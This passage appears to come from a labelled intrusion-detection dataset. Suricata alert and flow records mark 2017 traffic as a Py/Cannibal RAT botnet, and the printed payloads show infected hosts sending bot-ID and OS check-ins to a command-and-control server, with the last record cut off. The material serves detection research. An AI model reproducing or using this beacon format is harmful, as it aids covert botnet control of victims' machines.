[{'timestamp': '2017-07-07T13:06:25.665618+0000', 'flow_id': 1990109726574080, 'pcap_cnt': 3964579, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1991, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:06:25.591360+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAofD1AAIAGQOnAqAoJza6lSQfHH5DUMRAv+VXT+FARAQCYIwAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:06:25.665618+0000', 'flow_id': 1990109726574080, 'pcap_cnt': 3964579, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1991, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:06:25.591360+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAofD1AAIAGQOnAqAoJza6lSQfHH5DUMRAv+VXT+FARAQCYIwAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,235,026
192.168.10.9-1993-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 3966127, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:06:35
81,267
Friday
[{'timestamp': '2017-07-07T13:06:35.749337+0000', 'flow_id': 57529062864079, 'pcap_cnt': 3966127, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1993, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:06:35.668879+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAofKJAAIAGQITAqAoJza6lSQfJH5D1b0dTeTvzvlARAQCgEwAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:06:35.749337+0000', 'flow_id': 57529062864079, 'pcap_cnt': 3966127, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1993, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:06:35.668879+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAofKJAAIAGQITAqAoJza6lSQfJH5D1b0dTeTvzvlARAQCgEwAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,235,108
192.168.10.15-51930-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 1, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 3968974, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:06:54
71,086
Friday
[{'timestamp': '2017-07-07T13:06:55.032445+0000', 'flow_id': 990258521877891, 'pcap_cnt': 3968974, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 51930, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:06:54.961923+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobX1AAIAGT6PAqAoPza6lScraH5CFiTxxOzSIy1ARAQAAvwAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:06:55.032445+0000', 'flow_id': 990258521877891, 'pcap_cnt': 3968974, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 51930, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:06:54.961923+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobX1AAIAGT6PAqAoPza6lScraH5CFiTxxOzSIy1ARAQAAvwAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,235,222
192.168.10.15-51956-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: established, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: close_wait ; pcap_cnt: 3973886, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:07:05
125,426
Friday
[{'timestamp': '2017-07-07T13:07:05.165589+0000', 'flow_id': 1392319001108323, 'pcap_cnt': 3973886, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 51956, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:07:05.040803+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobYJAAIAGT57AqAoPza6lScr0H5A5Uxofi+DhLlARAQDGHQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:07:05.165589+0000', 'flow_id': 1392319001108323, 'pcap_cnt': 3973886, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 51956, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:07:05.040803+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobYJAAIAGT57AqAoPza6lScr0H5A5Uxofi+DhLlARAQDGHQAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
310
attack
1,235,514
192.168.10.15-52040-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 3981409, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:07:15
99,045
Friday
[{'timestamp': '2017-07-07T13:07:15.256884+0000', 'flow_id': 1133985308830578, 'pcap_cnt': 3981409, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52040, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:07:15.158578+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobYdAAIAGT5nAqAoPza6lSctIH5Cbz+e6B7fV0VARAQAlOAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:07:15.256884+0000', 'flow_id': 1133985308830578, 'pcap_cnt': 3981409, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52040, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:07:15.158578+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobYdAAIAGT5nAqAoPza6lSctIH5Cbz+e6B7fV0VARAQAlOAAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,235,775
192.168.10.15-52093-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 3983880, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:07:25
67,128
Friday
[{'timestamp': '2017-07-07T13:07:25.398670+0000', 'flow_id': 2000915868226154, 'pcap_cnt': 3983880, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52093, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:07:25.332394+0000'}, 'payload': 